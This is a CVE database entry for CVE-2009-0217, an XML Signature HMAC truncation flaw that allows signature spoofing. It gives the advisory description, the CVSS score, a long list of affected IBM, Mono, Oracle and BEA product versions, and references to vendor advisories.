CVE-2009-0217
Summary
| CVE | CVE-2009-0217 |
|---|---|
| State | PUBLISHED |
| Assigner | certcc |
| Source Priority | CVE Program / NVD first with legacy fallback |
| Published | 2009-07-14 23:30:00 UTC |
| Updated | 2026-04-23 00:35:47 UTC |
| Description | The design of the W3C XML Signature Syntax and Processing (XMLDsig) recommendation, as implemented in products including (1) the Oracle Security Developer Tools component in Oracle Application Server 10.1.2.3, 10.1.3.4, and 10.1.4.3IM; (2) the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, and 8.1 SP6; (3) Mono before 2.4.2.2; (4) XML Security Library before 1.2.12; (5) IBM WebSphere Application Server Versions 6.0 through 6.0.2.33, 6.1 through 6.1.0.23, and 7.0 through 7.0.0.1; (6) Sun JDK and JRE Update 14 and earlier; (7) Microsoft .NET Framework 3.0 through 3.0 SP2, 3.5, and 4.0; and other products uses a parameter that defines an HMAC truncation length (HMACOutputLength) but does not require a minimum for this length, which allows attackers to spoof HMAC-based signatures and bypass authentication by specifying a truncation length with a small number of bits. |
Risk And Classification
Primary CVSS: v2.0 5 from [email protected]
AV:N/AC:L/Au:N/C:N/I:P/A:N
Problem Types: NVD-CWE-Other | n/a
CVSS v2.0 Breakdown
Access Vector
NetworkAccess Complexity
LowAuthentication
NoneConfidentiality
NoneIntegrity
PartialAvailability
NoneAV:N/AC:L/Au:N/C:N/I:P/A:N
NVD Known Affected Configurations (CPE 2.3)
| Type | Vendor | Product | Version | Update | Edition | Language |
|---|---|---|---|---|---|---|
| Application | Ibm | Websphere Application Server | 6.0 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.0.1 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.0.2 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.0.3 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.1 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.11 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.13 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.15 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.17 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.2 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.3 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.5 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.7 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.9 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2 | All | fp17 | All |
| Application | Ibm | Websphere Application Server | 6.0.2.1 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.10 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.11 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.12 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.13 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.14 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.15 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.16 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.17 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.18 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.19 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.2 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.20 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.21 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.22 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.23 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.24 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.25 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.28 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.29 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.3 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.30 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.31 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.32 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.33 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.0 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.1 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.10 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.11 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.12 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.13 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.14 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.15 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.16 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.17 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.18 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.19 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.2 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.20 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.21 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.22 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.23 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.3 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.4 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.5 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.6 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.7 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.8 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.9 | All | All | All |
| Application | Ibm | Websphere Application Server | 7.0 | All | All | All |
| Application | Ibm | Websphere Application Server | 7.0.0.1 | All | All | All |
| Application | Mono Project | Mono | 1.2.1 | All | All | All |
| Application | Mono Project | Mono | 1.2.2 | All | All | All |
| Application | Mono Project | Mono | 1.2.3 | All | All | All |
| Application | Mono Project | Mono | 1.2.4 | All | All | All |
| Application | Mono Project | Mono | 1.2.5 | All | All | All |
| Application | Mono Project | Mono | 1.2.6 | All | All | All |
| Application | Mono Project | Mono | 1.9 | All | All | All |
| Application | Mono Project | Mono | 2.0 | All | All | All |
| Application | Oracle | Application Server | 10.1.2.3 | All | All | All |
| Application | Oracle | Application Server | 10.1.3.4 | All | All | All |
| Application | Oracle | Application Server | 10.1.4.3im | All | All | All |
| Application | Oracle | Bea Product Suite | 10.0 | mp1 | All | All |
| Application | Oracle | Bea Product Suite | 10.3 | All | All | All |
| Application | Oracle | Bea Product Suite | 8.1 | sp6 | All | All |
| Application | Oracle | Bea Product Suite | 9.0 | All | All | All |
| Application | Oracle | Bea Product Suite | 9.1 | All | All | All |
| Application | Oracle | Bea Product Suite | 9.2 | mp3 | All | All |
| Application | Oracle | Weblogic Server Component | 10.0 | mp1 | All | All |
| Application | Oracle | Weblogic Server Component | 10.3 | All | All | All |
| Application | Oracle | Weblogic Server Component | 8.1 | sp6 | All | All |
| Application | Oracle | Weblogic Server Component | 9.0 | All | All | All |
| Application | Oracle | Weblogic Server Component | 9.1 | All | All | All |
| Application | Oracle | Weblogic Server Component | 9.2 | mp3 | All | All |
Vendor Declared Affected Products
References
| Reference | Source | Link | Tags |
|---|---|---|---|
| SecurityTracker.com Archives - WebLogic Server Bugs Let Remote Users Gain Access and Modify Data and Deny Service | af854a3a-2127-422b-91ae-364da2661108 | www.securitytracker.com | |
| 511915 – (CVE-2009-0217) CVE-2009-0217 xmlsec1, mono, xml-security-c, xml-security-1.3.0-1jpp.ep1.*: XMLDsig HMAC-based signatures spoofing and authentication bypass | af854a3a-2127-422b-91ae-364da2661108 | bugzilla.redhat.com | |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| IBM WebSphere Application Server Multiple Vulnerabilities - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Bug 47526 – XML signature HMAC truncation authentication bypass | af854a3a-2127-422b-91ae-364da2661108 | issues.apache.org | |
| OpenOffice.org 3 Multiple Vulnerabilities - Advisories - Community | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Security | af854a3a-2127-422b-91ae-364da2661108 | blogs.sun.com | |
| OpenOffice.org 2 Multiple Vulnerabilities - Advisories - Community | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| SUSE update for OpenOffice_org - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Vulnerabilities - Mono | af854a3a-2127-422b-91ae-364da2661108 | www.mono-project.com | Vendor Advisory |
| Webmail : Solution de messagerie professionnelle - OVHcloud- OVH | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | |
| Mono XML Signature HMAC Truncation Spoofing - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| Debian -- Security Information -- DSA-1995-1 openoffice.org | af854a3a-2127-422b-91ae-364da2661108 | www.debian.org | |
| 47527 – XML signature HMAC truncation authentication bypass | af854a3a-2127-422b-91ae-364da2661108 | issues.apache.org | |
| IBM PK80596: Possible security exposure with XML digital signature - United States | af854a3a-2127-422b-91ae-364da2661108 | www-01.ibm.com | Patch, Vendor Advisory |
| RSA Security, Inc. Information for VU#466161 | af854a3a-2127-422b-91ae-364da2661108 | www.kb.cert.org | |
| Oracle Critical Patch Update Pre-Release Announcement - October 2010 | af854a3a-2127-422b-91ae-364da2661108 | www.oracle.com | |
| [SECURITY] Fedora 11 Update: java-1.6.0-openjdk-1.6.0.0-27.b16.fc11 | af854a3a-2127-422b-91ae-364da2661108 | www.redhat.com | |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| XML Security Library | af854a3a-2127-422b-91ae-364da2661108 | www.aleksey.com | |
| Webmail : Solution de messagerie professionnelle - OVHcloud- OVH | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | Patch, Vendor Advisory |
| [security-announce] SUSE Security Announcement: IBM Java 6 (SUSE-SA:2009 | af854a3a-2127-422b-91ae-364da2661108 | lists.opensuse.org | |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| Ubuntu update for openoffice.org - Advisories - Community | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Microsoft Security Bulletin MS10-041 - Important | Microsoft Docs | af854a3a-2127-422b-91ae-364da2661108 | docs.microsoft.com | |
| HP-UX update for JRE / JDK - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Repository / Oval Repository | af854a3a-2127-422b-91ae-364da2661108 | oval.cisecurity.org | |
| IBM PK80627; Possible security exposure with XML digital signature. - United States | af854a3a-2127-422b-91ae-364da2661108 | www-01.ibm.com | Patch, Vendor Advisory |
| Fedora update for java-1.6.0-openjdk - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| sunsolve.sun.com/search/document.do | af854a3a-2127-422b-91ae-364da2661108 | sunsolve.sun.com | |
| US-CERT Vulnerability Note VU#466161 | af854a3a-2127-422b-91ae-364da2661108 | www.kb.cert.org | US Government Resource |
| Sign in · GitLab | af854a3a-2127-422b-91ae-364da2661108 | git.gnome.org | |
| [SECURITY] Fedora 10 Update: java-1.6.0-openjdk-1.6.0.0-20.b16.fc10 | af854a3a-2127-422b-91ae-364da2661108 | www.redhat.com | |
| Oracle Critical Patch Update Advisory - July 2009 | af854a3a-2127-422b-91ae-364da2661108 | www.oracle.com | |
| Apache XML Security HMAC Truncation Spoofing - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| '[security bulletin] HPSBUX02476 SSRT090250 rev.1 - HP-UX Running Java, Remote Increase in Privilege,' - MARC | af854a3a-2127-422b-91ae-364da2661108 | marc.info | |
| Red Hat update for java-1.6.0-ibm - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| #125136-16: Obsoleted by: 125136-17 JavaSE for business 6: update 15 patch (equivalent to JDK 6u15) | af854a3a-2127-422b-91ae-364da2661108 | sunsolve.sun.com | |
| CVE-2009-0217 | af854a3a-2127-422b-91ae-364da2661108 | www.openoffice.org | |
| Repository / Oval Repository | af854a3a-2127-422b-91ae-364da2661108 | oval.cisecurity.org | |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| USN-903-1: OpenOffice.org vulnerabilities | Ubuntu | af854a3a-2127-422b-91ae-364da2661108 | www.ubuntu.com | |
| APPLE-SA-2009-09-03-1 Java for Mac OS X 10.5 Update 5 | af854a3a-2127-422b-91ae-364da2661108 | lists.apple.com | |
| IBM Possible security exposure with XML digital signature with IBM WebSphere Application Server (PK80596 and PK80627) - United States | af854a3a-2127-422b-91ae-364da2661108 | www-01.ibm.com | Patch, Vendor Advisory |
| Webmail : Solution de messagerie professionnelle - OVHcloud- OVH | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | |
| Webmail : Solution de messagerie professionnelle - OVHcloud- OVH | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | Patch, Vendor Advisory |
| Support | af854a3a-2127-422b-91ae-364da2661108 | www.redhat.com | |
| Sun Microsystems, Inc. Information for VU#466161 | af854a3a-2127-422b-91ae-364da2661108 | www.kb.cert.org | |
| osvdb.org/55907 | af854a3a-2127-422b-91ae-364da2661108 | osvdb.org | |
| SecurityTracker.com Archives - Java Runtime Environment (JRE) XML Digital Signature Flaw May Let Remote Users Bypass Authentication | af854a3a-2127-422b-91ae-364da2661108 | www.securitytracker.com | |
| Oracle Critical Patch Update Advisory - October 2009 | af854a3a-2127-422b-91ae-364da2661108 | www.oracle.com | |
| Red Hat update for java-1.6.0-sun - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| Oracle Open Office Multiple Vulnerabilities - Advisories - Community | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Sun Java JDK / JRE XML Signature HMAC Truncation Spoofing - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| IETF and W3C XML Digital Signature Specification HMAC Truncation Authentication Bypass Vulnerability | af854a3a-2127-422b-91ae-364da2661108 | www.securityfocus.com | Patch |
| HMAC truncation in XML Signature: When Alice didn't look. - W3C Blog | af854a3a-2127-422b-91ae-364da2661108 | www.w3.org | Vendor Advisory |
| Advisories | Mandriva | af854a3a-2127-422b-91ae-364da2661108 | www.mandriva.com | |
| US-CERT Technical Cyber Security Alert TA10-159B -- Microsoft Updates for Multiple Vulnerabilities | af854a3a-2127-422b-91ae-364da2661108 | www.us-cert.gov | US Government Resource |
| sunsolve.sun.com/search/document.do | af854a3a-2127-422b-91ae-364da2661108 | sunsolve.sun.com | |
| [SECURITY] Fedora 10 Update: xmlsec1-1.2.12-1.fc10 | af854a3a-2127-422b-91ae-364da2661108 | www.redhat.com | |
| Oracle Products Multiple Vulnerabilities - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| Webmail - OVH | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| About Secunia Research | Flexera | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| SecurityTracker.com Archives - Oracle Application Server Bugs Let Remote Users Modify Data | af854a3a-2127-422b-91ae-364da2661108 | www.securitytracker.com | |
| Gentoo Linux Documentation -- OpenOffice, LibreOffice: Multiple vulnerabilities | af854a3a-2127-422b-91ae-364da2661108 | www.gentoo.org | |
| Webmail : Solution de messagerie professionnelle - OVHcloud- OVH | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | |
| Sign in · GitLab | af854a3a-2127-422b-91ae-364da2661108 | git.gnome.org | |
| [Apache-SVN] Revision 794013 | af854a3a-2127-422b-91ae-364da2661108 | svn.apache.org | |
| Errata for XML Signature 2nd Edition | af854a3a-2127-422b-91ae-364da2661108 | www.w3.org | Vendor Advisory |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| RSA Products XML Signature HMAC Truncation Spoofing - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| Security Advisory SA60799 - Gentoo openoffice Multiple Vulnerabilties - Secunia | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Red Hat update for java-1.6.0-openjdk - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| XML Security Library XML Signature HMAC Truncation Spoofing - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| [SECURITY] Fedora 11 Update: xmlsec1-1.2.12-1.fc11 | af854a3a-2127-422b-91ae-364da2661108 | www.redhat.com | |
| Repository / Oval Repository | af854a3a-2127-422b-91ae-364da2661108 | oval.cisecurity.org | |
| Webmail : Solution de messagerie professionnelle - OVHcloud- OVH | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | Patch, Vendor Advisory |
| Ubuntu update for mono - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| #263429: A Security Vulnerability With Verifying HMAC-based XML Digital Signatures in the XML Digital Signature Implementation Included With the Java Runtime Environment (JRE) may Allow Authentication to be Bypassed | af854a3a-2127-422b-91ae-364da2661108 | sunsolve.sun.com | |
| [security-announce] SUSE Security Announcement: OpenOffice.org (SUSE-SA: | af854a3a-2127-422b-91ae-364da2661108 | lists.opensuse.org | |
| US-CERT Technical Cyber Security Alert TA09-294A -- Oracle Updates for Multiple Vulnerabilities | af854a3a-2127-422b-91ae-364da2661108 | www.us-cert.gov | US Government Resource |
| osvdb.org/55895 | af854a3a-2127-422b-91ae-364da2661108 | osvdb.org | |
| Webmail : Solution de messagerie professionnelle - OVHcloud- OVH | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | Patch, Vendor Advisory |
| USN-826-1: Mono vulnerabilities | Ubuntu security notices | af854a3a-2127-422b-91ae-364da2661108 | usn.ubuntu.com | |
| CVE Program record | CVE.ORG | www.cve.org | canonical |
| NVD vulnerability detail | NVD | nvd.nist.gov | canonical, analysis |
No vendor comments have been submitted for this CVE.
There are currently no legacy QID mappings associated with this CVE.